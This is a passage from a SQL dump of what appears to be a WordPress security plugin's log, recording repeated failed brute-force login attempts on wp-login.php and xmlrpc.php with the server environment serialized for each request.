empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"188.213.19.83\";s:11:\"REMOTE_PORT\";s:5:\"36376\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9Grgavjo3v4tJT4rvkuwAAAIo\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568622254.1881\";s:12:\"REQUEST_TIME\";s:10:\"1568622254\";}}','notice','2019-09-16 08:24:15','2019-09-16 08:24:14',18256400,19556096,'https://bintara.com.my/xmlrpc.php',1,0,'188.213.19.83'),(24025,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"207.55.255.20\";s:11:\"REMOTE_PORT\";s:5:\"59302\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9GruBXE2JRepjOtvmxfQAAAAs\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:13:\"1568622255.05\";s:12:\"REQUEST_TIME\";s:10:\"1568622255\";}}','notice','2019-09-16 08:24:16','2019-09-16 08:24:15',18256400,19556096,'https://bintara.com.my/xmlrpc.php',1,0,'207.55.255.20'),(24026,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"50.31.26.18\";s:11:\"REMOTE_PORT\";s:5:\"52228\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9JIQavjo3v4tJT4rvl@AAAAIA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568622881.2853\";s:12:\"REQUEST_TIME\";s:10:\"1568622881\";}}','notice','2019-09-16 08:34:42','2019-09-16 08:34:41',17740560,19232152,'https://bintara.com.my/wp-login.php',1,0,'50.31.26.18'),(24027,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"50.31.26.18\";s:11:\"REMOTE_PORT\";s:5:\"52523\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9JIwavjo3v4tJT4rvl@QAAAI8\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568622884.0339\";s:12:\"REQUEST_TIME\";s:10:\"1568622884\";}}','notice','2019-09-16 08:34:45','2019-09-16 08:34:44',18255952,19555160,'https://bintara.com.my/xmlrpc.php',1,0,'50.31.26.18'),(24028,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"159.203.12.18\";s:11:\"REMOTE_PORT\";s:5:\"46270\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9JLuBXE2JRepjOtvmx4gAAAAw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568622894.2477\";s:12:\"REQUEST_TIME\";s:10:\"1568622894\";}}','notice','2019-09-16 08:34:55','2019-09-16 08:34:54',17736744,19227392,'https://bintara.com.my/wp-login.php',1,0,'159.203.12.18'),(24029,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"159.203.12.18\";s:11:\"REMOTE_PORT\";s:5:\"47214\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9JMeBXE2JRepjOtvmx4wAAAAE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568622897.4519\";s:12:\"REQUEST_TIME\";s:10:\"1568622897\";}}','notice','2019-09-16 08:34:58','2019-09-16 08:34:57',18255208,19555272,'https://bintara.com.my/xmlrpc.php',1,0,'159.203.12.18'),(24030,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"68.183.173.177\";s:11:\"REMOTE_PORT\";s:5:\"51280\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9MKgavjo3v4tJT4rvnjAAAAJU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568623658.2249\";s:12:\"REQUEST_TIME\";s:10:\"1568623658\";}}','notice','2019-09-16 08:47:39','2019-09-16 08:47:38',17740216,19233128,'https://bintara.com.my/wp-login.php',1,0,'68.183.173.177'),(24031,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"68.183.173.177\";s:11:\"REMOTE_PORT\";s:5:\"51886\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9MLQavjo3v4tJT4rvnjgAAAIc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568623661.3329\";s:12:\"REQUEST_TIME\";s:10:\"1568623661\";}}','notice','2019-09-16 08:47:42','2019-09-16 08:47:41',18255728,19555368,'https://bintara.com.my/xmlrpc.php',1,0,'68.183.173.177'),(24032,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"149.202.201.88\";s:11:\"REMOTE_PORT\";s:5:\"45018\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9OhQavjo3v4tJT4rvomgAAAIo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568624261.7301\";s:12:\"REQUEST_TIME\";s:10:\"1568624261\";}}','notice','2019-09-16 08:57:42','2019-09-16 08:57:42',17739320,19231464,'https://bintara.com.my/wp-login.php',1,0,'149.202.201.88'),(24033,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is 